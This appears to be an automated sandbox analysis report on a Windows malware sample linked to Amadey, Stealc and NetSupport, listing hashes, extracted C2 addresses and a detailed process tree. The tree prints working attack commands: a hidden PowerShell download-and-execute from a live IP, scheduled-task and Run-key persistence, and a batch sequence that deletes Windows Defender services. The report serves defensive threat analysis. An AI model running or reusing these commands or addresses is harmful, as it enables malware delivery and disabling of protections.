Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20250207-en
  • resource tags

    arch:x64arch:x86image:win7-20250207-enlocale:en-usos:windows7-x64system
  • submitted
    26/03/2025, 19:32

General

  • Target

    2025-03-26_8c44b645c390b89b4a0d0bcdc9fe036a_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    8c44b645c390b89b4a0d0bcdc9fe036a

  • SHA1

    a007e77d13f4cc300e20fe1a866cdc9bb16bb878

  • SHA256

    380bd017cb49b4dc69065a7277f120ca8a98c4956df9d383a80ebc0b6459a136

  • SHA512

    300dd9fa2c5043d47da7265c37afc2dc8a49ded8fc21c27d310c951f88f72d4b121f2538c8d226374f69c214548262ef2532c1f8d3fe9496880f9e50abec2616

  • SSDEEP

    24576:JqDEvCTbMWu7rQYlBQcBiT6rprG8a0bu:JTvC/MTQYxsWR7a0b

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Netsupport family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 16 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 27 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 48 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Drops file in Program Files directory 46 IoCs
  • Drops file in Windows directory 32 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of FindShellTrayWindow 30 IoCs
  • Suspicious use of SendNotifyMessage 27 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1188
      • C:\Users\Admin\AppData\Local\Temp\2025-03-26_8c44b645c390b89b4a0d0bcdc9fe036a_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
        "C:\Users\Admin\AppData\Local\Temp\2025-03-26_8c44b645c390b89b4a0d0bcdc9fe036a_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:2128
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn 8zrgnmaucZv /tr "mshta C:\Users\Admin\AppData\Local\Temp\BBWKuVg9A.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2376
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn 8zrgnmaucZv /tr "mshta C:\Users\Admin\AppData\Local\Temp\BBWKuVg9A.hta" /sc minute /mo 25 /ru "Admin" /f
            4⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:1596
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\BBWKuVg9A.hta
          3⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1744
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'W2IIIVZ2AX57TYPZF1NRKP446XAET0ZN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2424
            • C:\Users\Admin\AppData\Local\TempW2IIIVZ2AX57TYPZF1NRKP446XAET0ZN.EXE
              "C:\Users\Admin\AppData\Local\TempW2IIIVZ2AX57TYPZF1NRKP446XAET0ZN.EXE"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Loads dropped DLL
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:2988
              • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Downloads MZ/PE file
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Loads dropped DLL
                • Adds Run key to start application
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:3032
                • C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe
                  "C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2592
                • C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe
                  "C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:2596
                  • C:\Windows\SysWOW64\CMD.exe
                    "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                    8⤵
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:2220
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      9⤵
                      • Enumerates processes with tasklist
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2640
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /I "opssvc wrsa"
                      9⤵
                        PID:2528
                      • C:\Windows\SysWOW64\tasklist.exe
                        tasklist
                        9⤵
                        • Enumerates processes with tasklist
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2840
                      • C:\Windows\SysWOW64\findstr.exe
                        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                        9⤵
                        • System Location Discovery: System Language Discovery
                        PID:2960
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c md 418377
                        9⤵
                        • System Location Discovery: System Language Discovery
                        PID:1880
                      • C:\Windows\SysWOW64\extrac32.exe
                        extrac32 /Y /E Leon.cab
                        9⤵
                        • System Location Discovery: System Language Discovery
                        PID:1996
                      • C:\Windows\SysWOW64\findstr.exe
                        findstr /V "BEVERAGES" Compilation
                        9⤵
                        • System Location Discovery: System Language Discovery
                        PID:2588
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                        9⤵
                          PID:376
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                          9⤵
                          • System Location Discovery: System Language Discovery
                          PID:2180
                        • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                          Passwords.com N
                          9⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SendNotifyMessage
                          PID:2932
                        • C:\Windows\SysWOW64\choice.exe
                          choice /d y /t 5
                          9⤵
                            PID:1308
                      • C:\Users\Admin\AppData\Local\Temp\10338870101\TbV75ZR.exe
                        "C:\Users\Admin\AppData\Local\Temp\10338870101\TbV75ZR.exe"
                        7⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Drops file in Windows directory
                        • System Location Discovery: System Language Discovery
                        PID:1776
                        • C:\Windows\SysWOW64\CMD.exe
                          "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
                          8⤵
                          • Loads dropped DLL
                          PID:560
                          • C:\Windows\SysWOW64\tasklist.exe
                            tasklist
                            9⤵
                            • Enumerates processes with tasklist
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1552
                          • C:\Windows\SysWOW64\findstr.exe
                            findstr /I "opssvc wrsa"
                            9⤵
                            • System Location Discovery: System Language Discovery
                            PID:956
                          • C:\Windows\SysWOW64\tasklist.exe
                            tasklist
                            9⤵
                            • Enumerates processes with tasklist
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2612
                          • C:\Windows\SysWOW64\findstr.exe
                            findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                            9⤵
                            • System Location Discovery: System Language Discovery
                            PID:2652
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c md 267978
                            9⤵
                            • System Location Discovery: System Language Discovery
                            PID:448
                          • C:\Windows\SysWOW64\extrac32.exe
                            extrac32 /Y /E Spanish.vss
                            9⤵
                            • System Location Discovery: System Language Discovery
                            PID:2324
                          • C:\Windows\SysWOW64\findstr.exe
                            findstr /V "East" Removed
                            9⤵
                            • System Location Discovery: System Language Discovery
                            PID:1776
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
                            9⤵
                              PID:1252
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
                              9⤵
                              • System Location Discovery: System Language Discovery
                              PID:1932
                            • C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
                              Exam.com j
                              9⤵
                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of SendNotifyMessage
                              PID:1740
                            • C:\Windows\SysWOW64\choice.exe
                              choice /d y /t 5
                              9⤵
                                PID:2640
                          • C:\Users\Admin\AppData\Local\Temp\10340260101\f703d02432.exe
                            "C:\Users\Admin\AppData\Local\Temp\10340260101\f703d02432.exe"
                            7⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2964
                          • C:\Users\Admin\AppData\Local\Temp\10340560101\WLbfHbp.exe
                            "C:\Users\Admin\AppData\Local\Temp\10340560101\WLbfHbp.exe"
                            7⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Drops file in Windows directory
                            • System Location Discovery: System Language Discovery
                            PID:2756
                            • C:\Windows\SysWOW64\CMD.exe
                              "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
                              8⤵
                              • Loads dropped DLL
                              • System Location Discovery: System Language Discovery
                              PID:2912
                              • C:\Windows\SysWOW64\tasklist.exe
                                tasklist
                                9⤵
                                • Enumerates processes with tasklist
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2284
                              • C:\Windows\SysWOW64\findstr.exe
                                findstr /I "opssvc wrsa"
                                9⤵
                                • System Location Discovery: System Language Discovery
                                PID:560
                              • C:\Windows\SysWOW64\tasklist.exe
                                tasklist
                                9⤵
                                • Enumerates processes with tasklist
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2736
                              • C:\Windows\SysWOW64\findstr.exe
                                findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                9⤵
                                • System Location Discovery: System Language Discovery
                                PID:2700
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c md 267978
                                9⤵
                                • System Location Discovery: System Language Discovery
                                PID:1704
                              • C:\Windows\SysWOW64\extrac32.exe
                                extrac32 /Y /E Spanish.vss
                                9⤵
                                • System Location Discovery: System Language Discovery
                                PID:2684
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
                                9⤵
                                • System Location Discovery: System Language Discovery
                                PID:2620
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
                                9⤵
                                • System Location Discovery: System Language Discovery
                                PID:776
                              • C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
                                Exam.com j
                                9⤵
                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of SendNotifyMessage
                                PID:2460
                              • C:\Windows\SysWOW64\choice.exe
                                choice /d y /t 5
                                9⤵
                                • System Location Discovery: System Language Discovery
                                PID:612
                          • C:\Users\Admin\AppData\Local\Temp\10340730101\BIm18E9.exe
                            "C:\Users\Admin\AppData\Local\Temp\10340730101\BIm18E9.exe"
                            7⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            PID:1652
                          • C:\Users\Admin\AppData\Local\Temp\10341360101\apple.exe
                            "C:\Users\Admin\AppData\Local\Temp\10341360101\apple.exe"
                            7⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • System Location Discovery: System Language Discovery
                            PID:1072
                            • C:\Users\Admin\AppData\Local\Temp\11.exe
                              "C:\Users\Admin\AppData\Local\Temp\11.exe"
                              8⤵
                              • Executes dropped EXE
                              PID:348
                              • C:\Windows\system32\cmd.exe
                                "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9A0E.tmp\9A0F.tmp\9A10.bat C:\Users\Admin\AppData\Local\Temp\11.exe"
                                9⤵
                                  PID:2712
                                  • C:\Users\Admin\AppData\Local\Temp\11.exe
                                    "C:\Users\Admin\AppData\Local\Temp\11.exe" go
                                    10⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                    PID:2328
                                    • C:\Windows\system32\cmd.exe
                                      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9AAA.tmp\9AAB.tmp\9AAC.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"
                                      11⤵
                                      • Drops file in Program Files directory
                                      PID:2968
                                      • C:\Windows\system32\sc.exe
                                        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                                        12⤵
                                        • Launches sc.exe
                                        PID:2796
                                      • C:\Windows\system32\sc.exe
                                        sc start ddrver
                                        12⤵
                                        • Launches sc.exe
                                        PID:560
                                      • C:\Windows\system32\timeout.exe
                                        timeout /t 1
                                        12⤵
                                        • Delays execution with timeout.exe
                                        PID:1564
                                      • C:\Windows\system32\sc.exe
                                        sc stop ddrver
                                        12⤵
                                        • Launches sc.exe
                                        PID:2744
                                      • C:\Windows\system32\sc.exe
                                        sc start ddrver
                                        12⤵
                                        • Launches sc.exe
                                        PID:2688
                                      • C:\Windows\system32\takeown.exe
                                        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                                        12⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        PID:2740
                                      • C:\Windows\system32\icacls.exe
                                        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                                        12⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        PID:2720
                                      • C:\Windows\system32\sc.exe
                                        sc stop "WinDefend"
                                        12⤵
                                        • Launches sc.exe
                                        PID:2716
                                      • C:\Windows\system32\sc.exe
                                        sc delete "WinDefend"
                                        12⤵
                                        • Launches sc.exe
                                        PID:2736
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                                        12⤵
                                          PID:624
                                        • C:\Windows\system32\sc.exe
                                          sc stop "MDCoreSvc"
                                          12⤵
                                          • Launches sc.exe
                                          PID:1704
                                        • C:\Windows\system32\sc.exe
                                          sc delete "MDCoreSvc"
                                          12⤵
                                          • Launches sc.exe
                                          PID:1184
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                                          12⤵
                                            PID:1964
                                          • C:\Windows\system32\sc.exe
                                            sc stop "WdNisSvc"
                                            12⤵
                                            • Launches sc.exe
                                            PID:2500
                                          • C:\Windows\system32\sc.exe
                                            sc delete "WdNisSvc"
                                            12⤵
                                            • Launches sc.exe
                                            PID:2684
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                                            12⤵
                                              PID:584
                                            • C:\Windows\system32\sc.exe
                                              sc stop "Sense"
                                              12⤵
                                              • Launches sc.exe
                                              PID:1788
                                            • C:\Windows\system32\sc.exe
                                              sc delete "Sense"
                                              12⤵
                                              • Launches sc.exe
                                              PID:1428
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                                              12⤵
                                                PID:2116
                                              • C:\Windows\system32\sc.exe
                                                sc stop "wscsvc"
                                                12⤵
                                                • Launches sc.exe
                                                PID:444
                                              • C:\Windows\system32\sc.exe
                                                sc delete "wscsvc"
                                                12⤵
                                                • Launches sc.exe
                                                PID:2132
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                                12⤵
                                                  PID:2384
                                                • C:\Windows\system32\sc.exe
                                                  sc stop "SgrmBroker"
                                                  12⤵
                                                  • Launches sc.exe
                                                  PID:236
                                                • C:\Windows\system32\sc.exe
                                                  sc delete "SgrmBroker"
                                                  12⤵
                                                  • Launches sc.exe
                                                  PID:2320
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                                  12⤵
                                                    PID:108
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop "SecurityHealthService"
                                                    12⤵
                                                    • Launches sc.exe
                                                    PID:1784
                                                  • C:\Windows\system32\sc.exe
                                                    sc delete "SecurityHealthService"
                                                    12⤵
                                                    • Launches sc.exe
                                                    PID:1660
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                                    12⤵
                                                      PID:872
                                                    • C:\Windows\system32\sc.exe
                                                      sc stop "webthreatdefsvc"
                                                      12⤵
                                                      • Launches sc.exe
                                                      PID:2592
                                                    • C:\Windows\system32\sc.exe
                                                      sc delete "webthreatdefsvc"
                                                      12⤵
                                                      • Launches sc.exe
                                                      PID:956
                                                    • C:\Windows\system32\reg.exe
                                                      reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                                      12⤵
                                                        PID:1800
                                                      • C:\Windows\system32\sc.exe
                                                        sc stop "webthreatdefusersvc"
                                                        12⤵
                                                        • Launches sc.exe
                                                        PID:1212
                                                      • C:\Windows\system32\sc.exe
                                                        sc delete "webthreatdefusersvc"
                                                        12⤵
                                                        • Launches sc.exe
                                                        PID:1112
                                                      • C:\Windows\system32\reg.exe
                                                        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                                        12⤵
                                                          PID:2652
                                                        • C:\Windows\system32\sc.exe
                                                          sc stop "WdNisDrv"
                                                          12⤵
                                                          • Launches sc.exe
                                                          PID:448
                                                        • C:\Windows\system32\sc.exe
                                                          sc delete "WdNisDrv"
                                                          12⤵
                                                          • Launches sc.exe
                                                          PID:752
                                                        • C:\Windows\system32\reg.exe
                                                          reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                                          12⤵
                                                            PID:2272
                                                          • C:\Windows\system32\sc.exe
                                                            sc stop "WdBoot"
                                                            12⤵
                                                            • Launches sc.exe
                                                            PID:1860
                                                          • C:\Windows\system32\sc.exe
                                                            sc delete "WdBoot"
                                                            12⤵
                                                            • Launches sc.exe
                                                            PID:1548
                                                          • C:\Windows\system32\reg.exe
                                                            reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                                            12⤵
                                                              PID:2560
                                                            • C:\Windows\system32\sc.exe
                                                              sc stop "WdFilter"
                                                              12⤵
                                                              • Launches sc.exe
                                                              PID:604
                                                            • C:\Windows\system32\sc.exe
                                                              sc delete "WdFilter"
                                                              12⤵
                                                              • Launches sc.exe
                                                              PID:2104
                                                            • C:\Windows\system32\reg.exe
                                                              reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                                              12⤵
                                                                PID:1224
                                                              • C:\Windows\system32\sc.exe
                                                                sc stop "SgrmAgent"
                                                                12⤵
                                                                • Launches sc.exe
                                                                PID:316
                                                              • C:\Windows\system32\sc.exe
                                                                sc delete "SgrmAgent"
                                                                12⤵
                                                                • Launches sc.exe
                                                                PID:1164
                                                              • C:\Windows\system32\reg.exe
                                                                reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                                12⤵
                                                                  PID:2196
                                                                • C:\Windows\system32\sc.exe
                                                                  sc stop "MsSecWfp"
                                                                  12⤵
                                                                  • Launches sc.exe
                                                                  PID:2832
                                                                • C:\Windows\system32\sc.exe
                                                                  sc delete "MsSecWfp"
                                                                  12⤵
                                                                  • Launches sc.exe
                                                                  PID:2840
                                                                • C:\Windows\system32\reg.exe
                                                                  reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                                  12⤵
                                                                    PID:2492
                                                                  • C:\Windows\system32\sc.exe
                                                                    sc stop "MsSecFlt"
                                                                    12⤵
                                                                    • Launches sc.exe
                                                                    PID:2188
                                                                  • C:\Windows\system32\sc.exe
                                                                    sc delete "MsSecFlt"
                                                                    12⤵
                                                                    • Launches sc.exe
                                                                    PID:2308
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                                    12⤵
                                                                      PID:2260
                                                                    • C:\Windows\system32\sc.exe
                                                                      sc stop "MsSecCore"
                                                                      12⤵
                                                                      • Launches sc.exe
                                                                      PID:2220
                                                                    • C:\Windows\system32\sc.exe
                                                                      sc delete "MsSecCore"
                                                                      12⤵
                                                                      • Launches sc.exe
                                                                      PID:1880
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                                      12⤵
                                                                        PID:2556
                                                                      • C:\Windows\system32\schtasks.exe
                                                                        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                                        12⤵
                                                                          PID:2980
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                                          12⤵
                                                                            PID:2856
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                                            12⤵
                                                                              PID:648
                                                                            • C:\Windows\system32\schtasks.exe
                                                                              schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                                              12⤵
                                                                                PID:1852
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc stop ddrver
                                                                                12⤵
                                                                                • Launches sc.exe
                                                                                PID:2316
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc delete ddrver
                                                                                12⤵
                                                                                • Launches sc.exe
                                                                                PID:2040
                                                                    • C:\Users\Admin\AppData\Local\Temp\10341760101\dBSGwVB.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\10341760101\dBSGwVB.exe"
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:1680
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd /c ""C:\Users\Public\Netstat\netsup.bat" "
                                                                        8⤵
                                                                        • Loads dropped DLL
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:1536
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
                                                                          9⤵
                                                                          • Adds Run key to start application
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:2728
                                                                        • C:\Users\Public\Netstat\bild.exe
                                                                          C:\Users\Public\Netstat\bild.exe
                                                                          9⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          PID:2140
                                                                    • C:\Users\Admin\AppData\Local\Temp\10342330101\kDveTWY.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\10342330101\kDveTWY.exe"
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      PID:2908
                                                                      • C:\Windows\system32\WerFault.exe
                                                                        C:\Windows\system32\WerFault.exe -u -p 2908 -s 36
                                                                        8⤵
                                                                        • Loads dropped DLL
                                                                        PID:1784
                                                                    • C:\Users\Admin\AppData\Local\Temp\10342650101\bdb301b94c.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\10342650101\bdb301b94c.exe"
                                                                      7⤵
                                                                      • Executes dropped EXE
